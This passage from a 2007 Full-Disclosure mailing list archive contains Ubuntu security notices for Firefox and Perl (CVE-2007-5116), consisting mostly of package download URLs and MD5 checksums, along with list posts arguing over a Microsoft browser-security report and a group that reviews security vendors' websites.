    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_powerpc.deb
      Size/MD5:   253490 001e374b392e6255ebd46c5b63af4e95
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_powerpc.deb
      Size/MD5:   890054 3902fd154817c75889e9ed3ff8c7979c

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.11+1nobinonly-0ubuntu0.7.4_sparc.deb
      Size/MD5: 49709456 6cf0280427d815a565728d4a368c5b71
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.11+1nobinonly-0ubuntu0.7.4_sparc.deb
      Size/MD5:  3169790 f4f5cc72d05911c078b1a6b40210d2f9
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.11+1nobinonly-0ubuntu0.7.4_sparc.deb
      Size/MD5:    86086 745f2978abc98f1071224c8c61501cc5
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.11+1nobinonly-0ubuntu0.7.4_sparc.deb
      Size/MD5:    61632 6bf8ab72b5ea960b97528fc2e9e68b0e
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+1nobinonly-0ubuntu0.7.4_sparc.deb
      Size/MD5:  9551248 b7cf3cd44881fbd0769c21442697d021
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_sparc.deb
      Size/MD5:   228298 cb542e6491b6d16c07a07003a4a4e4c3
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_sparc.deb
      Size/MD5:   161566 ff0b82ff46f1e5ccffa45e920bdea4d5
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_sparc.deb
      Size/MD5:   253466 b600f88117b3352f401c7ece6d1a8ea6
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.11+1nobinonly-0ubuntu0.7.4_sparc.deb
      Size/MD5:   795626 b39a5a4716bc2e8710d8d305c8900e6b

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+2nobinonly-0ubuntu0.7.10.diff.gz
      Size/MD5:   193340 d1e4083b92826fcd6118af5ef7fe817f
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+2nobinonly-0ubuntu0.7.10.dsc
      Size/MD5:     1825 2c7628dda6ed9e5ad3884cbd6e259b6e
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+2nobinonly.orig.tar.gz
      Size/MD5: 34977207 2561d704488ac7b8dfb677e9e67298dd

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.11+2nobinonly-0ubuntu0.7.10_all.deb
      Size/MD5:   200244 867345a0b9b8e645def0ad5336d6dbf1

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.11+2nobinonly-0ubuntu0.7.10_amd64.deb
      Size/MD5: 77906382 64658284c8093fad2fda64a12bcb4617
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.11+2nobinonly-0ubuntu0.7.10_amd64.deb
      Size/MD5:  3191930 0f70f268532e005e8c91838ffb7cd6ee
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.11+2nobinonly-0ubuntu0.7.10_amd64.deb
      Size/MD5:    97646 ed4d987259ecb0bc87b98b3499e3778f
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.11+2nobinonly-0ubuntu0.7.10_amd64.deb
      Size/MD5:    66646 e28d07c1813982bf5dd98023a4f652a4
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+2nobinonly-0ubuntu0.7.10_amd64.deb
      Size/MD5: 10435322 6c1aca38a8db7b0c064d1e6f10358f2c

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.11+2nobinonly-0ubuntu0.7.10_i386.deb
      Size/MD5: 77039234 ea3b67cdee8f2aa10a2461d387cdef2f
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.11+2nobinonly-0ubuntu0.7.10_i386.deb
      Size/MD5:  3179910 71d769907c92ffa90f7ab43f7253972e
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.11+2nobinonly-0ubuntu0.7.10_i386.deb
      Size/MD5:    91352 541c6ff2c54349f74b2f89f7d48b9b52
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.11+2nobinonly-0ubuntu0.7.10_i386.deb
      Size/MD5:    65944 68ece59cfffa607f11cdecdafc9e953d
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+2nobinonly-0ubuntu0.7.10_i386.deb
      Size/MD5:  9184670 71aa20c61601afd9652e0901b41f96b0

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.11+2nobinonly-0ubuntu0.7.10_powerpc.deb
      Size/MD5: 80501294 9cffab64539b82be99926b093d417e76
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.11+2nobinonly-0ubuntu0.7.10_powerpc.deb
      Size/MD5:  3195312 87baabb935243d3ea7a6ebb2033913c9
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.11+2nobinonly-0ubuntu0.7.10_powerpc.deb
      Size/MD5:    95676 ee55ee151a2f5eae00d2cd8695fd055f
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.11+2nobinonly-0ubuntu0.7.10_powerpc.deb
      Size/MD5:    66858 e82be6a14d87590fa19c045a2514076a
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+2nobinonly-0ubuntu0.7.10_powerpc.deb
      Size/MD5: 10279696 e5a7b106941f46c079fc52df9fae2807

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.11+2nobinonly-0ubuntu0.7.10_sparc.deb
      Size/MD5: 77872318 67e77c43463b6f126a8bba91cc98274f
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.11+2nobinonly-0ubuntu0.7.10_sparc.deb
      Size/MD5:  3177486 ef13adc32d4d6427109094b791a75274
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.11+2nobinonly-0ubuntu0.7.10_sparc.deb
      Size/MD5:    91112 1ec3e63a302946fe6cccdb595149f7bb
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.11+2nobinonly-0ubuntu0.7.10_sparc.deb
      Size/MD5:    66016 57a5884577cbc2725f2c02330c54a18b
    http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.11+2nobinonly-0ubuntu0.7.10_sparc.deb
      Size/MD5:  9430716 c7eef7899d066ce778baafde6b364ead

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071204/d026635d/attachment.bin 

From kristian.hermansen at gmail.com  Tue Dec  4 20:57:49 2007
From: kristian.hermansen at gmail.com (Kristian Erik Hermansen)
Date: Tue, 4 Dec 2007 12:57:49 -0800
Subject: [Full-disclosure] Internet Explorer Vuln Report,
	Debunked [Jeff R. Jones is becoming FUD-master]
Message-ID: <fe37588d0712041257x78b52788m121d9fc422acd4b6@mail.gmail.com>

Jeff R. Jones, a director of security strategy for Microsoft, has
issued another report on the security of Internet Explorer as compared
to Mozilla Firefox.  Now, we all understand that any software product
will have security issues, but Mr. Jones bases his analysis on the
fact that Mozilla patches more frequently.  See the report here on his
blog.

http://blogs.technet.com/security/archive/2007/11/30/download-internet-explorer-and-firefox-vulnerability-analysis.aspx

I have refuted the claims of a previous report on Microsoft Vista, but
instead of doing that again, I think the following excellent quote
sums up the entire analysis done by Mr. Jones -> "Just because
dentists fix more teeth in America doesn't mean our teeth are worse
than in Africa."
-- 
Kristian Erik Hermansen
"I have no special talent. I am only passionately curious."



From secreview at hushmail.com  Tue Dec  4 21:02:26 2007
From: secreview at hushmail.com (secreview at hushmail.com)
Date: Tue, 04 Dec 2007 16:02:26 -0500
Subject: [Full-disclosure] Professional IT Security Service Providers -
	Exposed
Message-ID: <20071204210226.A0DFF22846@mailserver5.hushmail.com>

Most intelligent people read the entire contents of what are said 
and ask questions before jumping to conclusions. Just to make sure 
that you've had the chance to read this, here it is again.

"Generally our reviews are done by reading the contents of the
companies website. We strip away all the marketing fluff and we
look for untruths, poor grammar, quality of service, team talent
and capabilities, site clarity, etc. If the website leaves us with
questions, or sounds too good to be true we call the security
company being reviewed and engage them in conversation about their
capabilities and offerings."

You'll notice that the above is an exact quote and not some altered 
version of what was said taken out of context by someone ("trains") 
trying to sound smart. 

Just to be clear, our mission is to expose IT Security Service 
Providers for what they really are, not to reinforce their 
marketing fluff and in some cases lies. 


On Tue, 04 Dec 2007 15:15:28 -0500 trains <trains at doctorunix.com> 
wrote:
>Quoting secreview at hushmail.com:
>Greetings List:
>
>My team and I have started doing critical reviews of security
>companies that offer Professional IT Security Services. We find 
>...
><snip>
>May I offer a correction.  Try this message:
>
>     "My Team and I have reviewed web sites of companies and
>     (based on their web dev skillz and marketing lingo) have
>     rated the companies' security capabilities."
>
>based on their web sites.   that makes me sad.  that's right in 
>there  
>with counting the number CISSPs at a company.
>
>the sales people I have to work with assure me that the product  
>doesn't matter.  they keep telling me, "all that matters is the 
>sizzle  
>on the website and the well engineered marketing message".  Every 
>day  
>I tell them they are f'd up aholes.
>
>It looks like they are right.
>
>* sigh *
>
>
>
>tr
>
>-------------------------------------------------
>Email solutions, MS Exchange alternatives and extrication,
>security services, systems integration.
>Contact:    services at doctorunix.com
>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

--
Faster loans with less paperwork. Compare rates. Click to find the right loan.
http://tagline.hushmail.com/fc/Ioyw6h4d9K1UVf4lnU2X2ZnaQdEMPIDRrMEiziaDY3VLzmyk971YAQ/



From kees at ubuntu.com  Wed Dec  5 00:07:16 2007
From: kees at ubuntu.com (Kees Cook)
Date: Tue, 4 Dec 2007 16:07:16 -0800
Subject: [Full-disclosure] [USN-552-1] Perl vulnerability
Message-ID: <20071205000716.GC8789@outflux.net>

=========================================================== 
Ubuntu Security Notice USN-552-1          December 04, 2007
perl vulnerability
CVE-2007-5116
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libperl5.8                      5.8.7-10ubuntu1.1

Ubuntu 6.10:
  libperl5.8                      5.8.8-6ubuntu0.1

Ubuntu 7.04:
  libperl5.8                      5.8.8-7ubuntu0.1

Ubuntu 7.10:
  libperl5.8                      5.8.8-7ubuntu3.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that Perl's regular expression library did not correctly
handle certain UTF sequences.  If a user or automated system were tricked
into running a specially crafted regular expression, a remote attacker
could crash the application or possibly execute arbitrary code with
user privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1.diff.gz
      Size/MD5:   165472 98da6197bbc7b042806866f19809a8b5
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1.dsc
      Size/MD5:      737 a90e131231bab24114d318e852fbc451
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7.orig.tar.gz
      Size/MD5: 12512211 dacefa1fe3c5b6d7bbc334ad94826131

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.7-10ubuntu1.1_all.deb
      Size/MD5:  7207544 8a96f50ff5738a2fafd7beb74a02f435
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.7-10ubuntu1.1_all.deb
      Size/MD5:  2325742 021c622fda16904921dfcf02a6aa96c4
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.7-10ubuntu1.1_all.deb
      Size/MD5:    40008 bd31ddd280da57be85e00c7c19d1f457

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_amd64.deb
      Size/MD5:   640850 9d0719b4779da8f93fedfb0eb654132b
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_amd64.deb
      Size/MD5:     1012 9c697f9e42f949736cf725e9c2774371
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_amd64.deb
      Size/MD5:   820628 080304d81ce38cc91246c8c2b7ee891f
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_amd64.deb
      Size/MD5:    31478 dc27f9788ff01fd5097976ee75626e61
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_amd64.deb
      Size/MD5:  3978354 6d79ae2514a3ec9f152d0de125531192
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_amd64.deb
      Size/MD5:  2639400 2532bbf9f7ec861e7722d5cc1bef9836

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_i386.deb
      Size/MD5:   559856 9ca996d88c16acb2a19eb6f80e3a68f4
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_i386.deb
      Size/MD5:   505890 501159b17800e56a2824b06aca598460
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_i386.deb
      Size/MD5:   737866 d3ca5af34f45f36979e644cb5e94cbb9
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_i386.deb
      Size/MD5:    28974 c4eade3cf3be3b813bcbd7af7841b146
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_i386.deb
      Size/MD5:  3296740 7e67c35913fd8046a75434e401130497
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_i386.deb
      Size/MD5:  2404442 0138415fc08635142fb0985f30997655

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_powerpc.deb
      Size/MD5:   656338 6201cd747c040ba44701ed056c9760c0
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_powerpc.deb
      Size/MD5:     1014 fecb67e1721ab983e3fb1a69eb610672
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_powerpc.deb
      Size/MD5:   815514 2799cd895e4681ed7f194039368e1dae
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_powerpc.deb
      Size/MD5:    32042 808c4cdcc9db259a87224bbe75394c96
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_powerpc.deb
      Size/MD5:  3656072 73cdf23c1e5fbda52f4936bb6d52fc9a
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_powerpc.deb
      Size/MD5:  2594308 f6585376f877b9838bb62bd09002de49

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.7-10ubuntu1.1_sparc.deb
      Size/MD5:   599300 d4011b7ac37b77c53901f676a623cd0f
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.7-10ubuntu1.1_sparc.deb
      Size/MD5:     1008 caf72f034baf309d4a9269d45148325d
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.7-10ubuntu1.1_sparc.deb
      Size/MD5:   790400 23a9e4c89ad2fe168ccc2391a89e463d
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.7-10ubuntu1.1_sparc.deb
      Size/MD5:    30114 a53a3f41de69344ec741d46220e3ad7e
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.7-10ubuntu1.1_sparc.deb
      Size/MD5:  3581290 7be78922d29146a99fb5a3f7dec3790e
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/perl-debug_5.8.7-10ubuntu1.1_sparc.deb
      Size/MD5:  2485596 02c9351609686d699573508e64fa2db0

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1.diff.gz
      Size/MD5:    88034 e7b46f9bc884e567164e379ab26e9650
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1.dsc
      Size/MD5:      749 910ebb281f9ea452ae0857c8314d1cfd
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8.orig.tar.gz
      Size/MD5: 12829188 b8c118d4360846829beb30b02a6b91a7

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.8-6ubuntu0.1_all.deb
      Size/MD5:  7352010 b99926050f3b94b3e48860f70f740aa3
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.8-6ubuntu0.1_all.deb
      Size/MD5:  2309166 9d0fd2d1e39918d3dc0b1aab4c94fef1
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.8-6ubuntu0.1_all.deb
      Size/MD5:    40398 22b82469393909ff8696fb66c5cd3a53

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_amd64.deb
      Size/MD5:   633844 d731f8b5c5e72a8f901b8e5f1ff9c969
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_amd64.deb
      Size/MD5:     1060 3f823954c678b8ec7cdbfa162769c5a2
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_amd64.deb
      Size/MD5:   809976 4b9d37a405a280fecd1f66de779bb3ff
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_amd64.deb
      Size/MD5:  2740032 0f8417f96f652753f1ba80248cf00b22
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_amd64.deb
      Size/MD5:    33032 2f89afbc96c250918bc1ca19d91e1adb
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_amd64.deb
      Size/MD5:  4047288 5732ea8ac056e8b84eae8aacff85e39f

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_i386.deb
      Size/MD5:   576166 39f1f4597d70b448edabcf55ae025d31
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_i386.deb
      Size/MD5:   521498 35f0badd87f6ea95677671a923c0bd9b
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_i386.deb
      Size/MD5:   751416 fec47b71b9705f139a119e758522650c
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_i386.deb
      Size/MD5:  2507638 631968cae57f3b647ee7a2cbf6c1c326
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_i386.deb
      Size/MD5:    31446 697584fbffbdb407f414688b5e65de2e
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_i386.deb
      Size/MD5:  3375590 d60160cc0c6f0f02d7001c2b5b6c0eda

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_powerpc.deb
      Size/MD5:   655630 54ed7f131777c37840a07d45449abbed
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_powerpc.deb
      Size/MD5:     1058 c7d4ed077dc5f47813cf9651832c4139
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_powerpc.deb
      Size/MD5:   811264 dbfa0db2d5addbef8999a7ca635f76c9
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_powerpc.deb
      Size/MD5:  2704838 d58cadf730c133612a2b715a6d1ba76b
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_powerpc.deb
      Size/MD5:    33034 cb872bf5e3e82f2fadd68531744fce74
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_powerpc.deb
      Size/MD5:  3734780 89ad67a21fad9c6ad706ef4528ab244b

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-6ubuntu0.1_sparc.deb
      Size/MD5:   596308 ba0fd9953be95186e73fc0182e8bc638
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-6ubuntu0.1_sparc.deb
      Size/MD5:     1058 249e2f0416e9dda9b89b200fc0307abf
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-6ubuntu0.1_sparc.deb
      Size/MD5:   785358 57c0b81325a4178a03c5459f3764892c
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-6ubuntu0.1_sparc.deb
      Size/MD5:  2580646 a6bc6816614b1498813f73c64f6fcee5
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-6ubuntu0.1_sparc.deb
      Size/MD5:    31238 30dac6d5bc7e52ca86bf31b63d2b4bdc
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-6ubuntu0.1_sparc.deb
      Size/MD5:  3675336 12fa93853d4b4aec097c5bf94280fdb5

Updated packages for Ubuntu 7.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1.diff.gz
      Size/MD5:    93072 d7601147dea2f84164094cb5f465468f
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1.dsc
      Size/MD5:      833 dc5eec23d30c9c2949d7f8db63853b1e
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8.orig.tar.gz
      Size/MD5: 12829188 b8c118d4360846829beb30b02a6b91a7

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.8.8-7ubuntu0.1_all.deb
      Size/MD5:  7352222 e55e069d2f8000557b7b5b2aa0a1adcb
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.8.8-7ubuntu0.1_all.deb
      Size/MD5:  2309560 dd6bed420c639b12e8d87e1e1c17761f
    http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.8.8-7ubuntu0.1_all.deb
      Size/MD5:    40926 c175bc89fb6e7ab0a09b42a256dffc92

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_amd64.deb
      Size/MD5:   633990 6f659d15fd70053cadabb6eb4a62af97
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_amd64.deb
      Size/MD5:     1054 9bce50cfb434976acdf5fde560b20488
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_amd64.deb
      Size/MD5:   825078 097d8f4a1122478d3757e806ce87aa52
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_amd64.deb
      Size/MD5:  2751476 6f3d9b0d94b648240948c67cda43f5ea
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_amd64.deb
      Size/MD5:    33584 d9a3ef3ef1fe338c5d8d4b8becd90e54
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_amd64.deb
      Size/MD5:  4053672 6d4e46bffe916b65f60ad22646ffe04f

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_i386.deb
      Size/MD5:   575736 4e8b9308d46c94245aa425d5d748310b
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_i386.deb
      Size/MD5:   533092 0e51d08b389b40e4de7ba387d1e84ec6
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_i386.deb
      Size/MD5:   764366 95193d01ace6a4e14a1def19b3f30545
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_i386.deb
      Size/MD5:  2519080 f2d8e651e6a675a98f86f65646ce39e1
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_i386.deb
      Size/MD5:    31944 8c6a5688d5f2aff2af6a3720f493a171
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_i386.deb
      Size/MD5:  3387948 69d6eaa7c204c6fe7f64b654cf152894

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_powerpc.deb
      Size/MD5:   655158 5353abcd2b8cc6984e62af1560c23553
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_powerpc.deb
      Size/MD5:     1058 f4de2f8f93bc1b1b2b254165c145ee3b
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_powerpc.deb
      Size/MD5:   854058 a17efcd900e80cee096b1ad7d01b0f46
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_powerpc.deb
      Size/MD5:  2721466 1412c01799559dd3d78e82c74a916996
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_powerpc.deb
      Size/MD5:    37020 96638207a58488a7be3b5736020fa9fe
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_powerpc.deb
      Size/MD5:  3769700 da74c33814b0565f4f073b00cecea400

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.8.8-7ubuntu0.1_sparc.deb
      Size/MD5:   596338 0cd6d0e9704cd7ee3b3dd9e33f9d3396
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.8_5.8.8-7ubuntu0.1_sparc.deb
      Size/MD5:     1058 84c48fa4edef5274c8d9d4c55fe3b52a
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.8.8-7ubuntu0.1_sparc.deb
      Size/MD5:   798438 69eb63699dea95c17df557ccd44564ca
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.8.8-7ubuntu0.1_sparc.deb
      Size/MD5:  2592862 98850ef36922fa444fd0502afba43bd7
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.8.8-7ubuntu0.1_sparc.deb
      Size/MD5:    33070 d22c4f74172c4adba2697abf5c73c68e
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu0.1_sparc.deb
      Size/MD5:  3682418 60c99f0e4ccc43f85c79938a96ee0455

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1.diff.gz
      Size/MD5:    93377 1e4ec9cfc65220001f38e66bc4f56f9e
    http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.8.8-7ubuntu3.1.dsc
      Size/MD5:      833 4f3fbac268e294b885eae342164b3689
